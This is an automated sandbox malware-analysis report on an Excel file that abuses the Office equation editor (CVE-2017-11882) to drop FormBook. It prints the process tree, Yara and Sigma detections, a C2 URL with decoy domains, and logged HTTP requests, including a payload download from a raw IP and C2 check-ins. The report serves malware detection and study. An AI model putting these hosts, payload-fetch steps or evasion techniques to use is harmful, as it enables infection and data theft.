Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Form BA.xlsx

Overview

General Information

Sample Name:Form BA.xlsx
Analysis ID:452641
MD5:f683a8eb2e17866a194af9b23efda095
SHA1:b3002f93d24336a9af003a7a3da36217a7d7b8db
SHA256:e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3024 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1700 cmdline: 'C:\Users\Public\vbc.exe' MD5: 734A568749C7879E5CA5EA2B8E082F5E)
      • vbc.exe (PID: 1780 cmdline: C:\Users\Public\vbc.exe MD5: 734A568749C7879E5CA5EA2B8E082F5E)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • rundll32.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • cmd.exe (PID: 1544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 3.121.113.175, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3024, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3024, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1700
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1700
      Sigma detected: Suspicious Process Start Without DLLShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
      Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Form BA.xlsxVirustotal: Detection: 31%Perma Link
      Source: Form BA.xlsxReversingLabs: Detection: 30%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJoe Sandbox ML: detected
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: 6.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 6.2.vbc.exe.8967b0.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 6.3.vbc.exe.8967b0.0.unpackAvira: Label: TR/ATRAPS.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
      Source: global trafficDNS query: name: www.pon.xyz
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
      Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.gaigoilaocai.com/wufn/
      Performs DNS queries to domains with low reputationShow sources
      Source: C:\Windows\explorer.exeDNS query: www.pon.xyz
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:14:54 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 22 Jul 2021 05:09:55 GMTETag: "ae200-5c7af4c3e3d9d"Accept-Ranges: bytesContent-Length: 713216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc df f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d8 0a 00 00 08 00 00 00 00 00 00 ce f6 0a 00 00 20 00 00 00 00 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f6 0a 00 4f 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec d6 0a 00 00 20 00 00 00 d8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0b 00 00 06 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc e1 00 00 70 eb 00 00 03 00 00 00 01 00 00 06 4c cd 01 00 30 29 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 45 02 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a
      Source: global trafficHTTP traffic detected: GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1Host: www.pon.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1Host: www.intoxickiss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
      Source: global trafficHTTP traffic detected: GET /www/pool.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.121.113.175Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /www/pool.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.121.113.175Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1Host: www.pon.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1Host: www.intoxickiss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknownDNS traffic detected: queries for: www.pon.xyz
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
      Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
